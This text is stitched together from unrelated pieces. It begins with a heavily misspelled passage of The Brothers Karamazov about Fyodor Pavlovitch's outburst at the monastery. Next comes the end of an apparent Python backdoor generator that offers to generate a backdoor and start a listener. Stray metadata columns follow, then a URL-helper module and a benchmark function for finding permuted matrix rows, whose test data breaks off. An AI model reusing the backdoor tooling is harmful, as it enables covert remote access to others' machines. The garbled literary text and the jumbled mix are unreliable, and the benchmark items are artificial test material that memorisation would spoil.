"We must apologize most humbly, your reverance," began Miusov, simpering affably, and speakin in a dignified and respecful tone. "Pardonus for having come alone without the genttleman you invited, Fyodor Pavlovitch. He felt obliged to decline the honor of your hospitalty, and not wihtout reason. In the reverand Father Zossima's cell he was carried away by the unhappy dissention with his son, and let fall words which were quite out of keeping... in fact, quite unseamly... as" -- he glanced at the monks -- "your reverance is, no doubt, already aware. And therefore, recognising that he had been to blame, he felt sincere regret and shame, and begged me, and his son Ivan Fyodorovitch, to convey to you his apologees and regrets. In brief, he hopes and desires to make amends later. He asks your blessinq, and begs you to forget what has takn place."
As he utterred the last word of his terade, Miusov completely recovered his self-complecency, and all traces of his former iritation disappaered. He fuly and sincerelly loved humanity again.
The Father Superior listened to him with diginity, and, with a slight bend of the head, replied:
"I sincerly deplore his absence. Perhaps at our table he might have learnt to like us, and we him. Pray be seated, gentlemen."
He stood before the holly image, and began to say grace, aloud. All bent their heads reverently, and Maximov clasped his hands before him, with peculier fervor.
It was at this moment that Fyodor Pavlovitch played his last prank. It must be noted that he realy had meant to go home, and really had felt the imposibility of going to dine with the Father Superior as though nothing had happenned, after his disgraceful behavoir in the elder's cell. Not that he was so very much ashamed of himself -- quite the contrary perhaps. But still he felt it would be unseemly to go to dinner. Yet hiscreaking carriage had hardly been brought to the steps of the hotel, and he had hardly got into it, when he sudddenly stoped short. He remembered his own words at the elder's: "I always feel when I meet people that I am lower than all, and that they all take me for a buffon; so I say let me play the buffoon, for you are, every one of you, stupider and lower than I." He longed to revenge himself on everone for his own unseemliness. He suddenly recalled how he had once in the past been asked, "Why do you hate so and so, so much?" And he had answered them, with his shaemless impudence, "I'll tell you. He has done me no harm. But I played him a dirty trick, and ever since I have hated him."
Rememebering that now, he smiled quietly and malignently, hesitating for a moment. His eyes gleamed, and his lips positively quivered.
"Well, since I have begun, I may as well go on," he decided. His predominant sensation at that moment might be expresed in the folowing words, "Well, there is no rehabilitating myself now. So let me shame them for all I am worht. I will show them I don't care what they think -- that's all!"
He told the caochman to wait, while with rapid steps he returnd to the monastery and staight to the Father Superior's. He had no clear idea what he would do, but he knew that he could not control himself, and that a touch might drive him to the utmost limits of obsenity, but only to obsenity, to nothing criminal, nothing for which he couldbe legally punished. In the last resort, he could always restrain himself, and had marvelled indeed at himself, on that score, sometimes. He appeered in the Father Superior's dining-room, at the moment when the prayer was over, and all were moving to the table. Standing in the doorway, he scanned the company, and laughing his prolonged, impudent, malicius chuckle, looked them all boldly in the face. "They thought I had gone, and here I am again," he cried to the wholle room.
For one moment everyone stared at him withot a word; and at once everyone felt that someting revolting, grotescue, positively scandalous, was about to happen. Miusov passed immeditaely from the most benevolen frame of mind to the most savage. All the feelings that had subsided and died down in his heart revived instantly.
"No! this I cannot endure!" he cried. "I absolutly cannot! and... I certainly cannot!"
The blood rushed to his head. He positively stammered; but he was beyyond thinking of style, and he seized his hat.
"What is it he cannot?" cried Fyodor Pavlovitch, "that he absolutely cannot and certanly cannot? Your reverence, am I to come in or not? Will you recieve me as your guest?"
"You are welcome with all my heart," answerred the Superior. "Gentlemen!" he added, "I venture to beg you most earnesly to lay aside your dissentions, and to be united in love and family harmoni- with prayer to the Lord at our humble table."
"No, no, it is impossible!" cryed Miusov, beside himself.
"Well, if it is impossible for Pyotr Alexandrovitch, it is impossible for me, and I won't stop. That is why I came. I will keep with Pyotr Alexandrovitch everywere now. If you will go away, Pyotr Alexandrovitch, I will go away too, if you remain, I will remain. You stung him by what you said about family harmony, Father Superior, he does not admit he is my realtion. That's right, isn't it, von Sohn? Here's von Sohn. How are you, von Sohn?"
"Do you mean me?" mutered Maximov, puzzled.
"Of course I mean you," cried Fyodor Pavlovitch. "Who else? The Father Superior cuold not be von Sohn."
"But I am not von Sohn either. I am Maximov."
"No, you are von Sohn. Your reverence, do you know who von Sohn was? It was a famos murder case. He was killed in a house of harlotry -- I believe that is what such places are called among you- he was killed and robed, and in spite of his venarable age, he was nailed up in a box and sent from Petersburg to Moscow in the lugage van, and while they were nailling him up, the harlots sang songs and played the harp, that is to say, the piano. So this is that very von Solin. He has risen from the dead, hasn't he, von Sohn?"
"What is happening? What's this?" voices were heard in the groop of monks.
"Let us go," cried Miusov, addresing Kalganov.
"No, excuse me," Fyodor Pavlovitch broke in shrilly, taking another stepinto the room. "Allow me to finis. There in the cell you blamed me for behaving disrespectfuly just because I spoke of eating gudgeon, Pyotr Alexandrovitch. Miusov, my relation, prefers to have plus de noblesse que de sincerite in his words, but I prefer in mine plus de sincerite que de noblesse, and -- damn the noblesse! That's right, isn't it, von Sohn? Allow me, Father Superior, though I am a buffoon and play the buffoon, yet I am the soul of honor, and I want to speak my mind. Yes, I am teh soul of honour, while in Pyotr Alexandrovitch there is wounded vanity and nothing else. I came here perhaps to have a look and speak my mind. My son, Alexey, is here, being saved. I am his father; I care for his welfare, and it is my duty to care. While I've been playing the fool, I have been listening and havig a look on the sly; and now I want to give you the last act of the performence. You know how things are with us? As a thing falls, so it lies. As a thing once has falen, so it must lie for ever. Not a bit of it! I want to get up again. Holy Father, I am indignent with you. Confession is a great sacrament, before which I am ready to bow down reverently; but there in the cell, they all kneal down and confess aloud. Can it be right to confess aloud? It was ordained by the holy Fathers to confess in sercet: then only your confession will be a mystery, and so it was of old. But how can I explain to him before everyone that I did this and that... well, you understand what -- sometimes it would not be proper to talk about it -- so it is really a scandal! No, Fathers, one might be carried along with you to the Flagellants, I dare say.... att the first opportunity I shall write to the Synod, and I shall take my son, Alexey, home."
We must note here that Fyodor Pavlovitch knew whree to look for the weak spot. There had been at one time malicius rumors which had even reached the Archbishop (not only regarding our monastery, but in others where the instutition of elders existed) that too much respect was paid to the elders, even to the detrement of the auhtority of the Superior, that the elders abused the sacrament of confession and so on and so on -- absurd charges which had died away of themselves everywhere. But the spirit of folly, which had caught up Fyodor Pavlovitch and was bearring him on the curent of his own nerves into lower and lower depths of ignominy, prompted him with this old slander. Fyodor Pavlovitch did not understand a word of it, and he could not even put it sensibly, for on this occasion no one had been kneelling and confesing aloud in the elder's cell, so that he could not have seen anything of the kind. He was only speaking from confused memory of old slanders. But as soon as he had uttered his foolish tirade, he felt he had been talking absurd nonsense, and at once longed to prove to his audiance, and above all to himself, that he had not been talking nonsense. And, though he knew perfectily well that with each word he would be adding morre and more absurdity, he could not restrian himself, and plunged forward blindly.
"How disgraveful!" cried Pyotr Alexandrovitch.
"Pardon me!" said the Father Superior. "It was said of old, 'Many have begun to speak agains me and have uttered evil sayings about me. And hearing it I have said to myself: it is the correcsion of the Lord and He has sent it to heal my vain soul.' And so we humbely thank you, honored geust!" and he made Fyodor Pavlovitch a low bow.
"Tut -- tut -- tut -- sanctimoniuosness and stock phrases! Old phrasses and old gestures. The old lies and formal prostratoins. We know all about them. A kisss on the lips and a dagger in the heart, as in Schiller's Robbers. I don't like falsehood, Fathers, I want the truth. But the trut is not to be found in eating gudgeon and that I proclam aloud! Father monks, why do you fast? Why do you expect reward in heaven for that? Why, for reward like that I will come and fast too! No, saintly monk, you try being vittuous in the world, do good to society, without shuting yourself up in a monastery at other people's expense, and without expecting a reward up aloft for it -- you'll find taht a bit harder. I can talk sense, too, Father Superior. What have they got here?" He went up to the table. "Old port wine, mead brewed by the Eliseyev Brothers. Fie, fie, fathers! That is something beyond gudgeon. Look at the bottles the fathers have brought out, he he he! And who has provided it all? The Russian peasant, the laborer, brings here the farthing earned by his horny hand, wringing it from his family and the tax-gaterer! You bleed the people, you know, holy Fathers."
"This is too disgraceful!" said Father Iosif.
Father Paissy kept obsinately silent. Miusov rushed from the room, and Kalgonov afetr him.
"Well, Father, I will follow Pyotr Alexandrovitch! I am not coming to see you again. You may beg me on your knees, I shan't come. I sent you a thousand roubles, so you have begun to keep your eye on me. He he he! No, I'll say no more. I am taking my revenge for my youth, for all the humillition I endured." He thumped the table with his fist in a paroxysm of simulated feelling. "This monastery has played a great part in my life! It has cost me many bitter tears. You used to set my wife, the crazy one, against me. You cursed me with bell and book, you spread stories about me all over the place. Enough, fathers! This is the age of Liberalizm, the age of steamers and reilways. Neither a thousand, nor a hundred ruobles, no, nor a hundred farthings will you get out of me!"
It must be noted again that our monastery never had played any great part in his liffe, and he never had shed a bitter tear owing to it. But he was so carried away by his simulated emotion, that he was for one momant allmost beliefing it himself. He was so touched he was almost weeping. But at that very instant, he felt that it was time to draw back.
The Father Superior bowed his head at his malicious lie, and again spoke impressively:
"It is writen again, 'Bear circumspecly and gladly dishonor that cometh upon thee by no act of thine own, be not confounded and hate not him who hath dishonored thee.' And so will we."
"Tut, tut, tut! Bethinking thyself and the rest of the rigmarole. Bethink yourselfs Fathers, I will go. But I will take my son, Alexey, away from here for ever, on my parental authority. Ivan Fyodorovitch, my most dutiful son, permit me to order you to follow me. Von Sohn, what have you to stay for? Come and see me now in the town. It is fun there. It is only one short verst; instead of lenten oil, I will give you sucking-pig and kasha. We will have dinner with some brendy and liqueur to it.... I've cloudberry wyne. Hey, von Sohn, don't lose your chance." He went out, shuoting and gesticulating.
It was at that moment Rakitin saw him and pointed him out to Alyosha.
"Alexey!" his father shouted, from far off, cacthing sight of him. "You come home to me to-day, for good, and bring your pilow and matress, and leeve no trace behind."
Alyosha stood rooted to the spot, wacthing the scene in silense. Meanwhile, Fyodor Pavlovitch had got into the carriege, and Ivan was about to follow him in grim silance without even turnin to say good-bye to Alyosha. But at this point another allmost incrediple scene of grotesque buffoonery gave the finishng touch to the episode. Maximov suddenly appeered by the side of the carriage. He ran up, panting, afraid of being too late. Rakitin and Alyosha saw him runing. He was in such a hurry that in his impatiense he put his foot on the step on which Ivan's left foot was still resting, and clucthing the carriage he kept tryng to jump in. "I am going with you! " he kept shouting, laughing a thin mirthfull laugh with a look of reckless glee in his face. "Take me, too."
"There!" cried Fyodor Pavlovitch, delihted. "Did I not say he waz von Sohn. It iz von Sohn himself, risen from the dead. Why, how did you tear yourself away? What did you von Sohn there? And how could you get away from the dinner? You must be a brazen-faced fellow! I am that myself, but I am surprized at you, brother! Jump in, jump in! Let him pass, Ivan. It will be fun. He can lie somwhere at our feet. Will you lie at our feet, von Sohn? Or perch on the box with the coachman. Skipp on to the box, von Sohn!"
But Ivan, who had by now taken his seat, without a word gave Maximov a voilent punch in the breast and sent him flying. It was quite by chanse he did not fall.
"Drive on!" Ivan shouted angryly to the coachman.
"Why, what are you doing, what are you abuot? Why did you do that?" Fyodor Pavlovitch protested.
But the cariage had already driven away. Ivan made no reply.
"Well, you are a fellow," Fyodor Pavlovitch siad again.
After a pouse of two minutes, looking askance at his son, "Why, it was you got up all this monastery busines. You urged it, you approvved of it. Why are you angry now?"
"You've talked rot enough. You might rest a bit now," Ivan snapped sullenly.
Fyodor Pavlovitch was silent again for two minutes.
"A drop of brandy would be nice now," he observd sententiosly, but Ivan made no repsonse.
"You shall have some, too, when we get home."
Ivan was still silent.
Fyodor Pavlovitch waited another two minutes.
"But I shall take Alyosha away from the monastery, though you will dislike it so much, most honored Karl von Moor."
Ivan shrugged his shoulders contemptuously, and turning away stared at the road. And they did not speak again all the way home.
'''
'''
"""%(host,port))
print " "
print(bcolors.OKGREEN+"OK LET`S GENERATING BACKDOOR .....")
print " "
startlis = raw_input(bcolors.OKGREEN+'Your Backdoor Is Ready Do YOU WANNA START LISTENING ? [yes] or [no]')
if startlis == "yes":
listen()
else:
print "Happy Hacking !! "
if (input1 == "1"):
createshell()
if (input1 == "2"):
listen()
| 132.668623
| 1,882
| 0.784254
| 42,275
| 248,621
| 4.61107
| 0.048918
| 0.006489
| 0.012471
| 0.004063
| 0.988006
| 0.987857
| 0.987411
| 0.987411
| 0.987411
| 0.987001
| 0
| 0.010742
| 0.173211
| 248,621
| 1,873
| 1,883
| 132.739455
| 0.937574
| 0.00008
| 0
| 0.894737
| 0
| 0.413666
| 0.991983
| 0.06282
| 0
| 1
| 0.000097
| 0
| 0
| 0
| null | null | 0.022161
| 0.004617
| null | null | 0.027701
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
94ba5199effc4fd9e9d9b0908e2ff1c2a53b3062
| 2,011
|
py
|
Python
|
core/recc/http/http_utils.py
|
bogonets/answer
|
57f892a9841980bcbc35fa1e27521b34cd94bc25
|
[
"MIT"
] | 3
|
2021-06-20T02:24:10.000Z
|
2022-01-26T23:55:33.000Z
|
core/recc/http/http_utils.py
|
bogonets/answer
|
57f892a9841980bcbc35fa1e27521b34cd94bc25
|
[
"MIT"
] | null | null | null |
core/recc/http/http_utils.py
|
bogonets/answer
|
57f892a9841980bcbc35fa1e27521b34cd94bc25
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from functools import reduce
from recc.variables.http import URL_PATH_SEPARATOR
from recc.http import http_urls as u
def join_urls(*paths: str) -> str:
    """Join URL path segments onto the site root with single separators.

    Segments are folded left-to-right starting from ``u.root``; exactly one
    ``URL_PATH_SEPARATOR`` is kept between adjacent segments regardless of
    whether each segment carries a leading/trailing separator of its own.

    Fix over the original: an empty segment used to raise ``IndexError``
    (the original indexed ``y[0]`` unconditionally); empty segments are now
    skipped, which is what a URL joiner is expected to do. Behavior for all
    non-empty segments is unchanged.

    :param paths: one or more path segments (at least one is required).
    :return: the joined URL path as a string.
    """
    assert paths

    def _join(x: str, y: str) -> str:
        # Empty segments contribute nothing to the path.
        if not y:
            return x
        # x is never empty here: the fold is seeded with u.root
        # (presumably "/" — TODO confirm against recc.http.http_urls).
        left = x.endswith(URL_PATH_SEPARATOR)
        right = y.startswith(URL_PATH_SEPARATOR)
        if left and right:
            # Both sides carry a separator: drop the duplicate.
            return x + y[1:]
        if left or right:
            # Exactly one separator already present.
            return x + y
        # Neither side has one: insert it.
        return x + URL_PATH_SEPARATOR + y

    return reduce(_join, paths, u.root)
def v1_path(*paths: str, **kwargs: str) -> str:
    """Build an API v1 URL from *paths*, filling placeholders from *kwargs*."""
    result = join_urls(u.api_v1, *paths)
    if kwargs:
        return result.format(**kwargs)
    return result
def v2_path(*paths: str, **kwargs: str) -> str:
    """Build an API v2 URL path; format placeholders with ``kwargs`` if given."""
    result = join_urls(u.api_v2, *paths)
    if kwargs:
        return result.format(**kwargs)
    return result
def v2_admin_path(*paths: str, **kwargs: str) -> str:
    """Build an API v2 admin URL path; format placeholders with ``kwargs`` if given."""
    result = join_urls(u.api_v2_admin, *paths)
    if kwargs:
        return result.format(**kwargs)
    return result
def v2_dev_path(*paths: str, **kwargs: str) -> str:
    """Build an API v2 dev URL path; format placeholders with ``kwargs`` if given."""
    result = join_urls(u.api_v2_dev, *paths)
    if kwargs:
        return result.format(**kwargs)
    return result
def v2_main_path(*paths: str, **kwargs: str) -> str:
    """Build an API v2 main URL path; format placeholders with ``kwargs`` if given."""
    result = join_urls(u.api_v2_main, *paths)
    if kwargs:
        return result.format(**kwargs)
    return result
def v2_public_path(*paths: str, **kwargs: str) -> str:
    """Build an API v2 public URL path; format placeholders with ``kwargs`` if given."""
    result = join_urls(u.api_v2_public, *paths)
    if kwargs:
        return result.format(**kwargs)
    return result
def v2_self_path(*paths: str, **kwargs: str) -> str:
    """Build an API v2 self URL path; format placeholders with ``kwargs`` if given."""
    result = join_urls(u.api_v2_self, *paths)
    if kwargs:
        return result.format(**kwargs)
    return result
def v2_plugins_path(*paths: str, **kwargs: str) -> str:
    """Build an API v2 plugins URL path; format placeholders with ``kwargs`` if given."""
    result = join_urls(u.api_v2_plugins, *paths)
    if kwargs:
        return result.format(**kwargs)
    return result
def v2_plugins_pplugin_path(plugin: str, *paths: str, **kwargs: str) -> str:
    """Build an API v2 URL path for a specific plugin.

    The ``plugin`` name is substituted into the ``u.pplugin`` template first;
    remaining placeholders are formatted with ``kwargs`` if given.
    """
    plugin_segment = u.pplugin.format(plugin=plugin)
    result = join_urls(u.api_v2_plugins, plugin_segment, *paths)
    if kwargs:
        return result.format(**kwargs)
    return result
| 29.144928
| 79
| 0.638986
| 310
| 2,011
| 3.964516
| 0.135484
| 0.053702
| 0.102522
| 0.124491
| 0.71847
| 0.71847
| 0.71847
| 0.71847
| 0.71847
| 0.637917
| 0
| 0.014839
| 0.229239
| 2,011
| 68
| 80
| 29.573529
| 0.778065
| 0.010443
| 0
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022727
| 1
| 0.25
| false
| 0
| 0.068182
| 0
| 0.636364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
bf3f835a19753f4fec689116a65fb76ef25d9347
| 53,816
|
py
|
Python
|
data/transcoder_evaluation_gfg/python/FIND_PERMUTED_ROWS_GIVEN_ROW_MATRIX.py
|
mxl1n/CodeGen
|
e5101dd5c5e9c3720c70c80f78b18f13e118335a
|
[
"MIT"
] | 241
|
2021-07-20T08:35:20.000Z
|
2022-03-31T02:39:08.000Z
|
data/transcoder_evaluation_gfg/python/FIND_PERMUTED_ROWS_GIVEN_ROW_MATRIX.py
|
mxl1n/CodeGen
|
e5101dd5c5e9c3720c70c80f78b18f13e118335a
|
[
"MIT"
] | 49
|
2021-07-22T23:18:42.000Z
|
2022-03-24T09:15:26.000Z
|
data/transcoder_evaluation_gfg/python/FIND_PERMUTED_ROWS_GIVEN_ROW_MATRIX.py
|
mxl1n/CodeGen
|
e5101dd5c5e9c3720c70c80f78b18f13e118335a
|
[
"MIT"
] | 71
|
2021-07-21T05:17:52.000Z
|
2022-03-29T23:49:28.000Z
|
# Copyright (c) 2019-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
def f_gold ( mat , m , n , r ) :
    # Print the index of every row (other than row r) whose elements all
    # occur in row r.  NOTE(review): this is a set-membership test only —
    # it does not compare element counts, so it finds rows drawn from row
    # r's value set, not strict permutations; this matches the reference
    # GFG approach the benchmark mirrors.  Do not alter the logic: this is
    # a TransCoder evaluation "gold" function whose exact behavior
    # (including the print side effect) is the test oracle.
    #
    # mat: matrix as a list of rows; m: number of rows to scan;
    # n: number of columns; r: index of the reference row.
    # Collect the distinct values of row r.
    s = set ( )
    for j in range ( n ) :
        s.add ( mat [ r ] [ j ] )
    for i in range ( m ) :
        if i == r :
            continue
        for j in range ( n ) :
            if mat [ i ] [ j ] not in s :
                # Sentinel trick: push j two back before breaking so the
                # post-loop test `j + 1 != n` is guaranteed to detect the
                # mismatch even when it occurred at the last column
                # (where j would otherwise equal n - 1).
                j = j - 2
                break ;
        # j + 1 == n only when the inner loop completed without a break,
        # i.e. every element of row i was found in s.
        if j + 1 != n :
            continue
        print ( i )
#TOFILL
if __name__ == '__main__':
param = [
([[16, 25, 26, 30, 34, 42, 51, 57, 69, 80], [15, 24, 29, 30, 31, 50, 55, 60, 71, 83], [6, 16, 22, 28, 34, 56, 61, 86, 88, 89], [14, 22, 24, 25, 26, 48, 73, 76, 78, 88], [2, 2, 12, 28, 28, 67, 68, 80, 81, 83], [8, 18, 27, 41, 62, 76, 77, 89, 94, 98], [9, 36, 41, 44, 47, 49, 76, 91, 92, 92], [18, 19, 27, 28, 29, 31, 43, 73, 93, 95], [32, 44, 59, 66, 70, 79, 88, 93, 94, 98], [12, 25, 29, 32, 37, 63, 71, 78, 82, 95]],7,5,8,),
([[-38]],0,0,0,),
([[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1]],12,15,12,),
([[68, 97, 94, 63, 48, 25, 30, 82, 73, 97, 42, 31, 9, 59, 43, 91, 55, 60, 65, 83, 19, 21, 47, 80, 9, 30, 12, 53, 31, 96, 37, 21, 5], [62, 34, 83, 77, 34, 35, 41, 14, 24, 18, 14, 76, 55, 36, 73, 3, 51, 81, 90, 88, 3, 7, 79, 51, 42, 14, 65, 39, 45, 79, 47, 74, 92], [78, 98, 95, 41, 33, 99, 51, 12, 70, 31, 41, 1, 75, 58, 29, 98, 97, 9, 87, 49, 56, 97, 8, 86, 56, 94, 88, 31, 99, 99, 8, 16, 27], [79, 45, 86, 35, 35, 95, 56, 1, 27, 66, 74, 95, 8, 49, 70, 90, 24, 3, 2, 87, 21, 84, 79, 42, 48, 22, 46, 35, 69, 55, 66, 22, 57], [54, 64, 52, 77, 96, 11, 11, 11, 77, 64, 13, 83, 34, 10, 78, 98, 89, 32, 21, 69, 8, 21, 83, 60, 53, 61, 85, 32, 16, 90, 53, 70, 5], [57, 48, 60, 88, 88, 63, 13, 12, 96, 91, 41, 24, 12, 57, 41, 80, 77, 5, 93, 98, 67, 71, 72, 8, 61, 23, 2, 98, 71, 8, 55, 84, 33], [84, 13, 33, 28, 81, 75, 60, 73, 25, 7, 26, 75, 90, 44, 3, 43, 20, 93, 58, 93, 99, 73, 89, 66, 93, 25, 14, 12, 68, 48, 90, 49, 54], [68, 70, 22, 76, 53, 91, 22, 91, 37, 2, 39, 87, 8, 2, 23, 88, 26, 52, 87, 61, 51, 91, 76, 9, 1, 51, 26, 88, 38, 97, 93, 19, 40], [11, 38, 60, 75, 89, 11, 5, 66, 67, 24, 38, 53, 92, 73, 26, 9, 37, 17, 34, 30, 38, 61, 20, 26, 41, 71, 4, 98, 40, 92, 5, 50, 92], [2, 14, 54, 67, 28, 40, 91, 98, 46, 78, 31, 41, 24, 44, 11, 16, 34, 42, 49, 21, 82, 55, 52, 42, 82, 76, 47, 1, 18, 32, 58, 97, 13], [51, 79, 86, 84, 72, 9, 22, 35, 8, 27, 61, 56, 15, 39, 2, 66, 34, 63, 46, 29, 37, 3, 76, 61, 98, 58, 53, 91, 32, 10, 89, 96, 88], [67, 93, 71, 25, 11, 64, 81, 11, 55, 42, 65, 72, 33, 49, 73, 81, 27, 49, 68, 15, 99, 81, 92, 89, 14, 98, 77, 1, 7, 45, 35, 25, 86], [44, 33, 37, 61, 82, 71, 26, 70, 71, 76, 9, 51, 99, 55, 8, 73, 40, 12, 78, 40, 60, 54, 9, 17, 90, 32, 5, 24, 43, 73, 29, 23, 46], [74, 40, 32, 49, 88, 92, 42, 22, 64, 80, 29, 37, 8, 39, 52, 71, 34, 45, 69, 44, 23, 37, 50, 27, 67, 63, 2, 64, 76, 22, 83, 44, 74], [75, 7, 37, 31, 54, 60, 18, 20, 61, 53, 71, 11, 15, 72, 7, 1, 27, 41, 62, 46, 35, 5, 3, 53, 62, 5, 40, 31, 56, 84, 95, 82, 1], [82, 2, 45, 21, 88, 83, 70, 39, 68, 83, 
46, 49, 91, 3, 93, 98, 63, 25, 27, 43, 50, 43, 47, 62, 62, 7, 38, 72, 57, 48, 99, 64, 46], [45, 38, 98, 12, 57, 98, 34, 44, 73, 7, 27, 97, 79, 51, 36, 10, 76, 14, 19, 7, 31, 19, 86, 99, 39, 78, 44, 13, 37, 35, 44, 37, 91], [61, 70, 68, 52, 18, 25, 86, 19, 3, 28, 2, 35, 82, 40, 38, 57, 55, 2, 6, 98, 73, 68, 96, 98, 21, 72, 2, 8, 48, 13, 96, 36, 25], [99, 25, 21, 80, 47, 21, 29, 49, 24, 99, 40, 57, 59, 36, 13, 65, 15, 56, 45, 32, 97, 68, 71, 7, 19, 54, 1, 19, 38, 85, 28, 65, 98], [38, 93, 22, 1, 1, 79, 75, 87, 39, 49, 15, 66, 97, 98, 40, 73, 33, 78, 77, 27, 60, 45, 55, 89, 10, 93, 72, 78, 40, 40, 64, 59, 62], [87, 55, 14, 80, 62, 56, 91, 80, 1, 16, 60, 84, 55, 34, 38, 92, 1, 70, 67, 68, 93, 81, 73, 56, 35, 90, 73, 87, 33, 87, 55, 99, 99], [26, 75, 52, 1, 78, 3, 57, 85, 36, 21, 18, 51, 26, 30, 45, 95, 24, 97, 75, 68, 36, 93, 92, 37, 88, 43, 37, 29, 94, 83, 96, 38, 65], [98, 30, 29, 8, 74, 61, 86, 22, 14, 49, 93, 47, 66, 4, 7, 39, 58, 62, 32, 95, 34, 23, 65, 9, 21, 47, 45, 44, 12, 98, 91, 92, 28], [37, 35, 69, 31, 40, 54, 30, 30, 37, 4, 17, 33, 24, 75, 25, 84, 59, 66, 96, 92, 87, 56, 48, 16, 32, 89, 39, 44, 30, 73, 24, 48, 47], [83, 82, 6, 7, 25, 91, 38, 58, 10, 20, 79, 35, 18, 7, 87, 56, 31, 51, 15, 98, 22, 29, 61, 2, 12, 78, 7, 91, 77, 63, 87, 87, 18], [35, 75, 62, 70, 16, 58, 92, 60, 32, 16, 24, 9, 78, 25, 76, 54, 75, 16, 50, 2, 19, 69, 29, 92, 34, 59, 58, 12, 94, 45, 62, 89, 12], [14, 83, 42, 74, 93, 58, 96, 94, 25, 30, 81, 26, 47, 36, 26, 8, 33, 70, 94, 96, 99, 64, 96, 25, 36, 88, 49, 39, 60, 6, 43, 24, 65], [52, 96, 76, 29, 65, 68, 26, 21, 13, 75, 49, 52, 47, 10, 16, 97, 51, 87, 73, 86, 5, 99, 48, 40, 27, 37, 58, 60, 1, 49, 2, 26, 48], [22, 81, 11, 10, 42, 96, 27, 51, 69, 8, 92, 12, 41, 93, 75, 30, 18, 12, 98, 4, 61, 6, 43, 55, 72, 41, 92, 91, 49, 21, 74, 49, 5], [97, 63, 36, 47, 3, 35, 51, 12, 85, 90, 99, 2, 37, 31, 19, 1, 25, 52, 61, 37, 60, 11, 37, 35, 53, 17, 95, 77, 12, 42, 41, 71, 30], [77, 40, 69, 61, 43, 22, 79, 66, 52, 28, 34, 37, 19, 26, 51, 17, 13, 79, 
38, 87, 63, 98, 24, 15, 99, 70, 85, 63, 2, 78, 6, 9, 13], [18, 86, 88, 50, 35, 77, 66, 32, 72, 8, 54, 10, 11, 64, 35, 22, 50, 43, 58, 28, 61, 9, 47, 33, 92, 64, 69, 38, 1, 73, 77, 49, 58], [84, 47, 49, 83, 59, 14, 86, 10, 76, 62, 25, 16, 59, 72, 45, 41, 52, 24, 90, 18, 44, 73, 56, 69, 30, 79, 90, 4, 33, 27, 72, 87, 37]],18,17,20,),
([[-20, -14, 14, 84], [-34, -24, 46, 96], [18, 36, 66, 80], [-32, 28, 58, 94]],3,3,3,),
